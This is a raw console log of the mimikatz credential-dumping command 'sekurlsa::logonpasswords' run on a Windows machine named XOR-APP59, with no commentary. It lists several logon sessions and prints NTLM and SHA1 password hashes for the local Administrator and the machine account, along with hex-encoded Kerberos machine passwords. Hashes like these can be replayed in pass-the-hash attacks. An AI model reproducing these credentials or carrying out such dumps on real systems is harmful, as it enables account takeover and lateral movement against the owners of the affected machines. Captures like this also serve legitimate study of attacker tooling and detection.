mimikatz # sekurlsa::logonpasswords
 326357 (00000000:0004fad5)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 3/22/2021 5:34:33 AM
SID               : S-1-5-21-3051798232-4248191986-2095020414-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP59
         * NTLM     : 3fee04b01f59a1001a366a7681e95699
         * SHA1     : 3a8679fbfdfea03f2d3b5a1a1aa185cca912014b
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 236626 (00000000:00039c52)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP59
Logon Server      : XOR-APP59
Logon Time        : 3/10/2021 7:16:39 PM
SID               : S-1-5-21-3051798232-4248191986-2095020414-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP59
         * NTLM     : 3fee04b01f59a1001a366a7681e95699
         * SHA1     : 3a8679fbfdfea03f2d3b5a1a1aa185cca912014b
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP59
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 49110 (00000000:0000bfd6)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:18 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 797548f5899b5ecf47ef4bec90966868
         * SHA1     : 5097a9d97415d323efd15c31bca6942ab0e439ec
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 42 7f eb f2 3f 71 3d 40 e6 90 92 e6 d2 51 cc b3 d8 fb 9d 5d 52 e9 20 05 56 b3 e9 3f 99 3d 64 be 14 3a 36 a0 c0 a8 cc 94 aa 28 18 22 ec 64 3c b4 2e c5 c5 91 49 db a6 e7 73 d0 6a ba 00 29 ac 13 4f 73 c9 79 6f 79 33 15 07 65 66 62 c5 58 e1 9f 5c ae 87 97 b1 d6 b8 ff 22 41 d8 90 5b 81 8a 01 6f 9d e8 27 c0 29 b6 41 84 c0 33 9c e1 97 c1 d1 53 5e 13 b9 2c 7e c6 ba 6f 95 9c da fe d5 d3 79 5e 23 69 ab 7f 61 df 25 5f 10 73 84 b4 b4 af 18 6c a0 06 c8 b4 79 d4 4f 50 80 7d 51 42 1f 59 df 4f e1 ac b0 7b 4c 89 45 df 90 dc d6 ee da ff 6f cd d9 3d a5 7d c8 8e 4d bd ce 00 1c 4d 25 e7 eb 20 0a 3a ab 6d 92 b4 3f 32 af 8b 21 c2 48 45 99 8b bf 0f 59 a0 b8 9a 91 40 51 c6 fc 74 bb 50 06 e9 8e 6b 8c 4c 1d 02 fb 10 20 ef ef 1a 1f c1 67
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XOR-APP59$
Domain            : xor
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:18 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 797548f5899b5ecf47ef4bec90966868
         * SHA1     : 5097a9d97415d323efd15c31bca6942ab0e439ec
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app59$
         * Domain   : XOR.COM
         * Password : 42 7f eb f2 3f 71 3d 40 e6 90 92 e6 d2 51 cc b3 d8 fb 9d 5d 52 e9 20 05 56 b3 e9 3f 99 3d 64 be 14 3a 36 a0 c0 a8 cc 94 aa 28 18 22 ec 64 3c b4 2e c5 c5 91 49 db a6 e7 73 d0 6a ba 00 29 ac 13 4f 73 c9 79 6f 79 33 15 07 65 66 62 c5 58 e1 9f 5c ae 87 97 b1 d6 b8 ff 22 41 d8 90 5b 81 8a 01 6f 9d e8 27 c0 29 b6 41 84 c0 33 9c e1 97 c1 d1 53 5e 13 b9 2c 7e c6 ba 6f 95 9c da fe d5 d3 79 5e 23 69 ab 7f 61 df 25 5f 10 73 84 b4 b4 af 18 6c a0 06 c8 b4 79 d4 4f 50 80 7d 51 42 1f 59 df 4f e1 ac b0 7b 4c 89 45 df 90 dc d6 ee da ff 6f cd d9 3d a5 7d c8 8e 4d bd ce 00 1c 4d 25 e7 eb 20 0a 3a ab 6d 92 b4 3f 32 af 8b 21 c2 48 45 99 8b bf 0f 59 a0 b8 9a 91 40 51 c6 fc 74 bb 50 06 e9 8e 6b 8c 4c 1d 02 fb 10 20 ef ef 1a 1f c1 67
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:19 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 49131 (00000000:0000bfeb)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:18 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 7c13687d23a3a88e57fc9ef8bb4cdf2f
         * SHA1     : 6c7ca462ec6e5895b79d6ebf70c202c1d15e49f0
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP59$
         * Domain   : xor.com
         * Password : 2c 7b b3 6e 01 67 62 86 dd e4 91 98 b9 c6 b1 06 16 cd ad c8 d9 f2 84 02 3b db 17 66 98 73 8c a0 c1 81 f5 ec 59 7c e4 94 70 74 ff c8 79 a3 67 52 4e c2 0c dc b1 42 ba 2f 97 93 17 a7 4b 10 35 a3 97 cd d7 b1 bc 48 3f 4a 79 73 4e 90 3a 02 1c 21 2f 06 a2 79 39 36 02 42 65 9e f3 48 df e9 c9 7a 35 3d 9a 0e 87 88 6f dd b6 c3 25 b6 ee 5f 38 cf f0 2f 8e 80 8e fb 12 32 c7 76 4e a4 ff 5c cc ec 74 27 64 34 c5 5f da ca 29 f0 60 15 fa 66 a2 72 0b ee 3f 6e 9e 98 7d 71 80 58 78 dd a7 f2 c9 b0 d9 0d 8e 3f c1 38 56 91 cf 57 7b c8 be f9 43 cf 41 ed 4d 16 1c 47 86 3e ee 1d 16 a4 4c 0d 28 a3 71 2f 04 ae 9d 4d 4a 42 5c 3b aa f7 5a 68 52 d4 3d 56 c9 d9 56 d0 83 e2 f0 17 3b 57 4d 85 1c b8 6a 1b 1f 30 15 d7 e5 34 8c 97 41 33 8f cd d7 85
        ssp :
        credman :

Authentication Id : 0 ; 29093 (00000000:000071a5)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:17 PM
SID               :
        msv :
         [00000003] Primary
         * Username : XOR-APP59$
         * Domain   : xor
         * NTLM     : 797548f5899b5ecf47ef4bec90966868
         * SHA1     : 5097a9d97415d323efd15c31bca6942ab0e439ec
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XOR-APP59$
Domain            : xor
Logon Server      : (null)
Logon Time        : 3/10/2021 7:14:17 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XOR-APP59$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app59$
         * Domain   : XOR.COM
         * Password : 42 7f eb f2 3f 71 3d 40 e6 90 92 e6 d2 51 cc b3 d8 fb 9d 5d 52 e9 20 05 56 b3 e9 3f 99 3d 64 be 14 3a 36 a0 c0 a8 cc 94 aa 28 18 22 ec 64 3c b4 2e c5 c5 91 49 db a6 e7 73 d0 6a ba 00 29 ac 13 4f 73 c9 79 6f 79 33 15 07 65 66 62 c5 58 e1 9f 5c ae 87 97 b1 d6 b8 ff 22 41 d8 90 5b 81 8a 01 6f 9d e8 27 c0 29 b6 41 84 c0 33 9c e1 97 c1 d1 53 5e 13 b9 2c 7e c6 ba 6f 95 9c da fe d5 d3 79 5e 23 69 ab 7f 61 df 25 5f 10 73 84 b4 b4 af 18 6c a0 06 c8 b4 79 d4 4f 50 80 7d 51 42 1f 59 df 4f e1 ac b0 7b 4c 89 45 df 90 dc d6 ee da ff 6f cd d9 3d a5 7d c8 8e 4d bd ce 00 1c 4d 25 e7 eb 20 0a 3a ab 6d 92 b4 3f 32 af 8b 21 c2 48 45 99 8b bf 0f 59 a0 b8 9a 91 40 51 c6 fc 74 bb 50 06 e9 8e 6b 8c 4c 1d 02 fb 10 20 ef ef 1a 1f c1 67
        ssp :
        credman :
